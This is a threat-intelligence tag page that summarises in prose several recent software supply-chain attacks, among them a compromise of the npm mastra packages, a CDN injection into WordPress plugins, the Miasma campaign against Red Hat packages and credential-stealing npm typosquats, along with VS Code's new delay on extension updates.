Threats Tagged 'supply-chain-attack'

Microsoft Threat Intelligence discovered a large-scale npm supply chain attack compromising over 140 packages in the mastra and @mastra scopes. The attack originated from takeover of the ehindero npm maintainer account, which published poisoned package versions introducing easy-day-js, a malicious typosquat of the popular dayjs library. The malicious package executed a postinstall hook that deployed an obfuscated dropper script, disabled TLS certificate verification, contacted command-and-control infrastructure at 23.254.164.92 and 23.254.164.123, and downloaded a second-stage payload. This 41KB cross-platform Node.js implant installed persistence mechanisms, performed cryptocurrency wallet inventory, exfiltrated browser history and host reconnaissance data, and on Windows performed reflective .NET assembly injection for fileless in-memory code execution. Any developer workstation or CI/CD pipeline executing npm install after compromise was potentially exposed regardless of code usage.

A supply chain attack compromised the Awesome Motive CDN, injecting malicious JavaScript into files served by popular WordPress plugins OptinMonster, TrustPulse, and PushEngage. The injected code targeted logged-in WordPress administrators to create backdoor accounts and install a stealthy backdoor plugin that hides from the admin UI and allows remote code execution. The attack affected sites loading the compromised CDN scripts, exposing potentially millions of WordPress installations. The malicious activity was active briefly in June 2026 before cleanup, but the backdoor presence requires manual detection and remediation.

Miasma-style supply chain attacks represent a new category of supply chain threats that leverage the widespread use of third-party packages, CI/CD automation, and coding agent configuration files. These attacks are challenging to defend against, even for organizations with strong security postures. The threat is currently discussed in a recent blog post linked from a Reddit cybersecurity community, highlighting emerging risks in software supply chains.

Microsoft Visual Studio Code (VS Code) has introduced a two-hour delay before automatically updating extensions to mitigate risks associated with software supply chain attacks. This delay applies to most extensions except those from trusted publishers like Microsoft, GitHub, and OpenAI, which continue to update immediately. The feature aims to provide an additional layer of protection by allowing time to detect and respond to potentially compromised or problematic extension releases. Users retain the option to manually update extensions immediately if desired. This change aligns with similar time-delay controls recently adopted by other package managers to reduce exposure to malicious package versions. The update is available starting with VS Code version 1.123.

The Miasma campaign is a supply chain attack targeting Red Hat npm packages under the @redhat-cloud-services namespace. Attackers used a compromised Red Hat employee's GitHub account to push malicious commits and abused GitHub Actions OIDC workflows to publish packages with valid SLSA provenance, bypassing supply chain verification. This attack highlights a weakness in the trust model of npm publishing workflows, where the build pipeline's trust boundary can be circumvented upstream. The campaign also includes new variants that collect cloud identities from GCP and Azure, escalating the threat beyond credential harvesting to active cloud access enumeration. Attribution remains uncertain, with possible links to the publicly released TeamPCP toolkit. No known exploits in the wild or official patches have been reported yet.

A supply chain attack targeting the npm ecosystem was identified involving 14 malicious packages published under the alias vpmdhaj. These packages typosquat well-known OpenSearch, ElasticSearch, and DevOps libraries, executing malicious payloads through npm lifecycle hooks during installation. The attack deploys a two-stage credential harvesting operation that targets AWS credentials, HashiCorp Vault tokens, GitHub Actions secrets, and npm publish tokens. The malware queries AWS Instance Metadata Service, ECS task metadata, and enumerates AWS Secrets Manager across multiple regions. Two stager variants were observed: an HTTP-based C2 beacon and a stealthier version abusing the legitimate Bun runtime. The stolen credentials enable cloud lateral movement and downstream supply chain attacks through compromised npm maintainer identities, specifically targeting developers working with cloud and CI/CD infrastructure.